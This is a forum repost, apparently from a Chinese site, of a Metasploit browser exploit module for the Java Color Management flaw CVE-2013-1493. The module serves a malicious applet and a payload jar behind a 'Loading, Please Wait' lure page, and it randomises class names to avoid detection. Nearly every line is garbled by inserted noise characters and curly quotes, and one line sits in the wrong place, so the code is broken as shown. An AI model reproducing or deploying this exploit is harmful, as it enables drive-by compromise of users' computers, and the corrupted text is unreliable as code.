## V8 i: A1 W4 j" C
Z9 x( l. v; T) S! |! |( I
# This file is part of the Metasploit Framework and may be subject to q' G! i0 @0 N- Y/ n
# redistribution and commercial restrictions. Please see the Metasploit
) e5 K& ]7 n2 T/ }. [$ ^6 b+ U; t- }/ T# web site for more information on licensing and terms of use.
9 n3 i, ^, w- c0 W9 Y( r: z# http://metasploit.com/9 i( W7 ~% D U( `5 `) ^ n r$ y
##
; Y+ ]; ~% @' g1 Nrequire ‘msf/core’
4 f& z' a* r. F" ^require ‘rex’
" i5 |% Y9 U# H9 Oclass Metasploit3 < Msf::Exploit::Remote. c1 j1 `$ u. M" c8 a$ m% k2 J- D8 K
Rank = NormalRanking
. }3 Z9 i, Q. [& ~1 rinclude Msf::Exploit::Remote::HttpServer::HTML( ^) r, v. K3 }/ E
include Msf::Exploit::EXE
4 C8 p1 f9 y4 [# ~! M: r! pinclude Msf::Exploit::Remote::BrowserAutopwn
( E$ ]& a* t- a" V* V+ E5 Z1 xautopwn_info({ :javascript => false })
0 m4 U. T- K! v9 M A, bdef initialize( info = {} )
; W3 s& J0 c: A$ Lsuper( update_info( info,2 L+ D1 I0 b0 y9 R7 W1 T
‘Name’ => ‘Java CMM Remote Code Execution’,
" k# _: e2 C- \7 V‘Description’ => %q{
% Z5 P0 g, E2 A. E! \% s4 \4 P4 jThis module abuses the Color Management classes from a Java Applet to run; i. i9 `+ B; _ h
arbitrary Java code outside of the sandbox as exploited in the wild in February, |, l1 d! ]3 a
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
; r* v7 m0 ^; ]! _and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
6 O# ~4 D9 D: n# F0 E+ Ysystems. This exploit doesn’t bypass click-to-play, so the user must accept the java" m: L& s R0 z( {+ f) P
warning in order to run the malicious applet., p- G, q% l5 [& ]4 F4 w E$ c4 ^
},( R" ^4 [: l0 |6 |1 o+ f2 B
‘License’ => MSF_LICENSE,
' E# q- @0 A7 r; W0 B‘Author’ =>. O( a+ a) n, I# f& ?8 z. E
'Unknown', # Vulnerability discovery and Exploit
+ ?& k/ l6 z$ |' E Y'juan vazquez' # Metasploit module (just ported the published exploit)
- [' W1 p o6 n: P) ?9 f6 d],
- Q- l( N* x0 t7 Q! j8 E; Z8 Z6 U‘References’ =>
' w1 u9 M& T2 }/ p: w( D[
( |0 G1 \5 L# V; ~ U+ t[ 'CVE', '2013-1493' ],. W# B3 g' L1 z4 H
[ 'OSVDB', '90737' ],
7 [, \2 n: N: x5 @: d[ 'BID', '58238' ],
6 o( S9 z6 C/ \* M% H& G[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ]," b& K& V' X9 |1 [* o. C9 H
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
# l8 B; z( t s6 i# Y2 Z y[ 'URL', 'http://pastie.org/pastes/6581034' ]
$ I1 }" ~2 S% h( y, y% J],# X7 s4 o* a) M+ C- V0 P
‘Platform’ => [ 'win', 'java' ],2 ^! {' g! C% D7 Q/ |9 z/ q2 r
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },; [9 K$ o0 F) d2 ?6 q n0 R
‘Targets’ =>% r3 E/ |6 k$ R+ h
[4 \4 ^( w: z# i8 H, R4 ?! s
[ 'Generic (Java Payload)',
9 ?. M; f+ g0 c/ h{
# Z+ Y' f3 A+ h; V: f& L'Platform' => 'java',
! X/ S' m7 o$ N# o0 ]'Arch' => ARCH_JAVA
8 T9 x4 i2 }, c/ `}
7 h5 l" R- u- O( j$ ~! ]],
1 b# Z# a) j' h" h) }0 f3 x" f[ 'Windows x86 (Native Payload)',- V ?+ P/ G% `( U# n7 ~3 w. i6 M8 n
{9 A% N6 f0 {1 l5 x* t% t4 e# P
'Platform' => 'win',
f0 }' U ?* I'Arch' => ARCH_X863 j" ^( ]* v$ d- O$ P
}5 L+ d7 N( y4 Y* k( }" w
]
/ ^& y9 S$ G, v+ j+ n],
$ a# \- b# l! T$ r1 P6 a‘‘DisclosureDate’ => ‘Mar 01 2013′
. b6 S, b( H1 A0 T" }& `))0 Q# E+ l2 @1 d* b% N
end
4 J _7 g6 V. @, X0 g$ Qdef setup7 p: @& R9 t; L. w/ {/ m8 R0 j
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)7 v( ~: J8 k! P b
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }! s. \, a! d1 K* A
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
2 H: r" N; z! T1 N/ k2 D@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
1 A5 F5 V! h* U6 h Y# h' Gpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)/ O7 A9 G6 N# w) e
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
' q% t4 f Y+ u3 e4 w* lpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
! A# f# i. m' J3 J: R- I' |@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }2 i; n: \) g! G* t+ Y
@init_class_name = rand_text_alpha(“Init”.length)* L- ^0 H4 t9 m
@init_class.gsub!(“Init”, @init_class_name)
" Q \: g3 Y( V- Z M7 ^super1 h7 `5 [7 x( A+ ~4 G% H* O& Z
end
" f1 \2 O/ ~: `5 m( `/ ydef on_request_uri(cli, request)
- G9 P" g) {/ y3 Z' T( dprint_status(“handling request for #{request.uri}”)0 S- A6 c$ q+ w
case request.uri9 h6 O2 `/ Q3 D( {4 l) K8 B
when /\.jar$/i
, d2 j. t- v1 Pjar = payload.encoded_jar' Y# n' z, R0 T+ \
jar.add_file(“#{@init_class_name}.class”, @init_class)
, J. S" U8 g9 r) Cjar.add_file(“Leak.class”, @leak_class)
8 A- Y7 f7 S9 Y! R: pjar.add_file(“MyBufferedImage.class”, @buffered_image_class)% H) q! F a$ A% w
jar.add_file(“MyColorSpace.class”, @color_space_class)
+ t% \7 R9 w$ u, M9 zDefaultTarget’ => 1,
) A8 Q4 z' M9 @. P: x: smetasploit_str = rand_text_alpha(“metasploit”.length)
5 \& M5 U) P- n; Z1 e7 O( epayload_str = rand_text_alpha(“payload”.length)
5 J9 R* X5 _! d @- S* Njar.entries.each { |entry|+ q, u; S. B9 R( z
entry.name.gsub!(“metasploit”, metasploit_str)
~' g9 J6 F* j( q* |- U0 }3 h. P+ \entry.name.gsub!(“Payload”, payload_str)4 `# F- ]+ q6 c2 |4 A5 f
entry.data = entry.data.gsub(“metasploit”, metasploit_str)6 D* ~) O8 x) F3 x6 q" M8 |, X# ?$ D
entry.data = entry.data.gsub(“Payload”, payload_str)
8 Q: F8 Y H' F. c2 }4 q}
; D, W5 G3 Y% a4 Tjar.build_manifest7 ]6 Z+ z% h! ?) T" M
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
8 y& e8 J! o$ v& A! Iwhen /\/$/; K, Q( H' b$ \. E9 y, q2 H
payload = regenerate_payload(cli)
( n$ ~6 z* k1 Q( F# m% L5 eif not payload( P8 c6 {* f* p* u" r& h- X
print_error(“Failed to generate the payload.”), P6 @$ E! Z ~5 n# t. V
send_not_found(cli)
, _3 Y% i2 E8 H9 Q, v8 l4 O5 areturn& W0 I+ p( R. i$ v& g
end ^' b& r: @- y5 L/ y+ c7 V: x- u
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
6 K$ X: f( O8 a, @+ Celse- f4 S' f' y9 p0 a
send_redirect(cli, get_resource() + ‘/’, ”)
. }% P" e- ^$ v) v8 lend F2 X5 G& \' j1 `* s7 d3 h
end
- H3 I0 B2 ~# a5 B# f" idef generate_html2 M( o% `5 e5 n. @
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|& p& @5 L# _; _* |8 _" ^# A( V( f
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|3 W; w3 u7 ]9 m; E( S8 b9 q
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
: f8 t: F: ^4 C/ f+ U+ K3 U$ Ehtml += %Q|</applet></body></html>|
( s1 T, s3 E( Z; \return html7 g& _- W/ k8 n) k4 o# u
end4 L1 m& O4 o4 z7 _0 u
end4 R8 M5 D& b; X# f8 m6 G4 P0 w8 r
end4 G- ^) N+ Y" w8 D3 O8 s
|
发表于 2013-4-4 17:31:17
收藏
支持
反对